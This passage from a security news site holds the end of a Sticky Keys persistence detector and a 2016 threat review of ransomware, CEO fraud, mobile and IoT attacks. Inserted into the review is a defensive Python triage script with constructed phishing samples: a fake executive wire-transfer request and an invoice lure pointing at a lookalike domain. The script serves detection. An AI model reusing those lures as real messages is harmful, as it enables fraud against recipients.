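    for f in find_ifeo_debuggers(parse_reg(SAMPLE_REG)):
        print(f)
```

Run against a live export of the IFEO key, any Debugger value on one of these binaries is the persistence the post describes, and it survives the credential change the victim makes, which is why it belongs in the post-incident checklist alongside the RDP password reset.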

The post Hackers Spark Revival of Sticky Keys Attacks appeared first on CyberSafety.co.za.

Cyber Security Predictions for 2017


Analysis

2016 kicked off with more than 20 million new samples of malware detected and neutralised by PandaLabs – an average of 227,000 per day. This figure is slightly higher than that of 2015, which saw around 225,000 per day.

Throughout 2016, we’ve seen how the number of new malware has been slightly lower than in 2015 — about 200,000 new samples of malware per day on average — however attacks have become more effective.

Cybercriminals are becoming more confident in their abilities, and, although figures have been lower than expected, there is still cause for concern. Hackers appear to be concentrating their efforts into the most profitable attacks, utilising sophisticated techniques that allow them to make quick and easy money in an efficient manner.

Black Hats have turned their focus to productivity, proliferating attacks on businesses that handle massive quantities of data and sensitive information. Once they’ve gained access to these businesses, they are able to infect as many computers as possible with ransomware, putting themselves in a position to demand millions in ransom or put the data up for sale on the black market.

If there is one thing that hasn’t changed over the course of this year, it’s the popularity of trojans, with ransomware at the forefront, continuing to top the statistical charts for years.


Ranking the top attacks of 2016



Ransomware

We know that ransomware is a substantial business for cybercriminals, but it is incredibly tricky to measure the number of attacks reliably. What can be noted is the evolution of Ransomware attacks, in some cases having become particularly aggressive, as is the case of Petya. Instead of encrypting documents, Petya goes straight for the computer’s Master Boot Record (MBR) and makes it unserviceable until a ransom is paid.

Abuse of the system tool PowerShell has risen this year; installed by default in Windows 10, it is frequently used in attacks to avoid detection by the security solutions installed on victims’ computers.

In Q2 of 2016, one of the strangest cases of ransomware involved a company in Slovenia. The company’s head of security received an email from Russia informing him that their network had been compromised and that the senders were poised to launch ransomware on all of their computers if the company didn’t pay around €9000 in Bitcoin within 3 days. To prove that they did in fact have access to the organisation’s network, the hackers sent a file listing every device connected to the company’s internal network.

Ransomware as a Service (RaaS) emerged as the latest development in the ransomware industry. In Q3 we witnessed a higher level of specialisation in the ransomware trade. The best example of this featured the creators of the ransomware Petya and Mischa, who specialised in the development of the malware and its corresponding payment platforms, leaving distribution in the hands of third parties. Once the creators have done their part, they leave it up to the distributors to infect victims. Much like in the legitimate business world, the distributors’ profit is derived from a percentage of the money acquired: the higher the sales, the higher the percentage they receive.


Malicious email

Attacks don’t only come in the form of malvertising or compromised websites. A large number of them still arrive through email in the form of false invoices or other notifications. An attack of this sort was carried out in at least two European countries, in which cybercriminals posed as their respective local electricity supply companies. The message contained no attachment, showing only the billing information in text and including a link that when clicked would take you to the invoice details. The hook was an exorbitantly high payment that would entice an emotional response so that the recipient would click through to consult the supposed bill without thinking. Upon clicking the link, the user was directed to a website that resembled the company’s real website, where a bill could be downloaded. If the client downloaded and opened the file, they became infected with ransomware.


Business Email Compromise Phishing

Hackers will investigate how the company operates from the inside and get information from their victims off of social networks to give credibility to their con. The attackers then pose as the CEO or financial director of a company and request a transfer from an employee. This kind of attack is rapidly gaining in popularity.

A notable case this year affected Mattel, the well-known toy manufacturer of Barbies and Hot Wheels. A high ranking executive received a message from the recently appointed CEO soliciting a transfer of $3 million to a bank account in China. After making the transfer, he then confirmed with the CEO that it was done, who in turn was baffled, having not given such an order. They got in touch with the American authorities and with the bank, but it was too late and the money had already been transferred.

In this case they were fortunate. It was a bank holiday in China, which left enough time to alert the Chinese authorities; the account was frozen and Mattel recovered its money.
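Both lures above, the fake-invoice email whose link points at a lookalike of the supplier's site and the CEO-fraud request for a wire transfer, leave traces in the message headers and links that a mail gateway or SOC triage script can check before a human sees the money figure. The following is an added example, not code from the original report or from any vendor it mentions; the executive names, the domains and the three messages are constructed for illustration, and a production version would use a public-suffix list and the organisation's real directory instead of the hard-coded sets.

```python
import re
from email import message_from_string
from email.utils import parseaddr
from urllib.parse import urlparse

# Hypothetical organisation data: people who may legitimately request money, and the
# domains (ours and a supplier's) from which mail and links are expected.
EXECUTIVES = {"alex rivera", "dana okafor"}
TRUSTED_DOMAINS = {"example-corp.com", "energy-supplier.example"}
MONEY_WORDS = re.compile(r"\b(wire|transfer|invoice|payment|urgent|overdue)\b", re.I)
URL_RE = re.compile(r"https?://[^\s<>\"']+")


def registered_domain(host: str) -> str:
    """Last two labels of a host name (good enough here; real code would use a public-suffix list)."""
    parts = host.lower().rstrip(".").split(".")
    return ".".join(parts[-2:])


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch typo-squatted sender domains such as supp1ier."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(host: str):
    """Return the trusted domain that `host` imitates, or None if it is trusted or unrelated."""
    host = host.lower()
    reg = registered_domain(host)
    if reg in TRUSTED_DOMAINS:
        return None
    for trusted in TRUSTED_DOMAINS:
        label = trusted.split(".")[0]
        # trusted name buried in a longer host, trusted label extended, or a typo-squat
        if trusted in host or label in reg or levenshtein(reg.split(".")[0], label) <= 2:
            return trusted
    return None


def triage(raw_message: str) -> list:
    """Return the list of BEC / invoice-lure indicators found in one RFC 822 message."""
    msg = message_from_string(raw_message)
    display_name, from_addr = parseaddr(msg.get("From", ""))
    from_domain = registered_domain(from_addr.rpartition("@")[2])
    _, reply_addr = parseaddr(msg.get("Reply-To", ""))
    body = msg.get_payload() if not msg.is_multipart() else ""
    text = msg.get("Subject", "") + "\n" + body
    findings = []

    # CEO fraud: a known executive's name on an address outside our domains.
    if display_name.strip().lower() in EXECUTIVES and from_domain not in TRUSTED_DOMAINS:
        findings.append(f"executive name '{display_name}' used from external domain {from_domain}")
    # Replies silently redirected to a mailbox the attacker controls.
    if reply_addr:
        reply_domain = registered_domain(reply_addr.rpartition("@")[2])
        if reply_domain != from_domain:
            findings.append(f"Reply-To domain {reply_domain} differs from From domain {from_domain}")
    # Sender domain or any link that imitates a trusted domain (the fake invoice site).
    imitated = lookalike_of(from_domain)
    if imitated:
        findings.append(f"sender domain {from_domain} imitates {imitated}")
    for url in URL_RE.findall(text):
        host = urlparse(url).hostname or ""
        imitated = lookalike_of(host)
        if imitated:
            findings.append(f"link to {host} imitates {imitated}")
    # Money or urgency wording only matters once something else already looks wrong.
    words = sorted({w.lower() for w in MONEY_WORDS.findall(text)})
    if words and findings:
        findings.append("money/urgency wording: " + ", ".join(words))
    return findings


# Constructed sample messages (not real mail): a CEO-fraud request, an invoice lure, and a benign note.
CEO_FRAUD = """\
From: Alex Rivera <alex.rivera@example-corp-mail.com>
Reply-To: alex.rivera@freemail.example
To: cfo@example-corp.com
Subject: Urgent: wire transfer needed today

Please transfer 3,000,000 USD to the account below before close of business.
I am in meetings all day, so confirm by email only.
"""

INVOICE_LURE = """\
From: Customer Billing <billing@energy-supp1ier.example>
To: accounts@example-corp.com
Subject: Electricity invoice 2,314.90 EUR overdue

Your latest invoice is ready and payment is overdue.
Download it here: http://energy-supplier.example.invoice-portal.example/bill/8841
"""

LEGITIMATE = """\
From: Alex Rivera <alex.rivera@example-corp.com>
To: cfo@example-corp.com
Subject: Board dinner

Are you free on Thursday evening?
"""

if __name__ == "__main__":
    for label, sample in (("CEO fraud", CEO_FRAUD), ("invoice lure", INVOICE_LURE), ("legitimate", LEGITIMATE)):
        print(label, "->", triage(sample) or "no indicators")
```

The constructed CEO-fraud message trips four indicators (executive name on an external domain, mismatched Reply-To, a sender domain that extends the company's own, and transfer/urgency wording); the invoice lure trips the typo-squatted sender domain and the link whose host merely begins with the supplier's name; the benign note trips none. None of these checks replaces an out-of-band confirmation of a payment request, which is what would have saved Mattel's $3 million, but they are cheap to run on every inbound message.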



Mobile Devices

SNAP is one of the most widely reported vulnerabilities we have seen this year, affecting LG G3 phones. The problem stemmed from a flaw in LG's notifications app, Smart Notice, which allowed arbitrary JavaScript to run. Researchers at BugSec discovered the vulnerability and notified LG, which quickly published an update resolving the problem.

Gugi, an Android trojan, managed to bypass the security barriers introduced in Android 6 to steal banking credentials from apps installed on the phone. To do so, Gugi overlaid the legitimate app's screen with its own, asking for information that was then sent straight to the criminals without the victim's knowledge.

In August, Apple published an urgent update, iOS 9.3.5. It resolves three zero-day vulnerabilities exploited by a piece of spyware known as Pegasus, developed by NSO Group, an Israeli company whose products are similar to those offered by Hacking Team.


Internet of Things

Connected cars are at risk from cyber-attack: researchers at the University of Birmingham showed how they had compromised the remote door-locking system of vehicles sold by the Volkswagen Group over the last twenty years. Researchers Charlie Miller and Chris Valasek, who last year demonstrated how to hack a Jeep Cherokee, went a step further this year and showed how they could manipulate the throttle, the brakes and even the steering wheel at will while the car was in gear.

Smart homes are just as vulnerable: researchers Andrew Tierney and Ken Munro demonstrated a proof of concept they built to hijack a thermostat. After taking control of the device (by inserting an SD card into it), they raised the temperature to 99 degrees Fahrenheit and required a PIN to deactivate it. The thermostat connected to an IRC channel, using its MAC address as the identifier of each compromised device, and demanded one bitcoin in exchange for the PIN, which changed every 30 seconds.



Cyberwarfare

2016 saw the United States go on the offensive and concede that it is launching cyber-attacks against Daesh targets; Robert Work, United States Deputy Secretary of Defense, said as much in statements to CNN.

In February, South Korean officials discovered an attack originating from North Korea. The attack had allegedly begun more than a year earlier; its primary targets were 140,000 computers belonging to organisations and government agencies, as well as defense contractors. According to police statements, more than 42,000 documents were stolen, 95% of them defense-related, including documents containing plans and specifications for the F-15 fighter jet.

At the height of the United States presidential election, one of the most significant incidents was the discovery of an attack on the DNC (Democratic National Committee), in which a trove of data was plundered and later leaked to the public.

Also on the subject of the elections, the FBI issued an alert after detecting two attacks on electoral websites; in at least one of them the attackers, identified as foreign, made off with voter registration data.

In August, a group calling itself “The Shadow Brokers” announced that it had hacked the NSA and published some of the “cyber weapons” that it had stolen, promising to sell the rest to the highest bidder.


Cybercrime

In June, a criminal dubbed “The Dark Overlord” put patient information from three US instit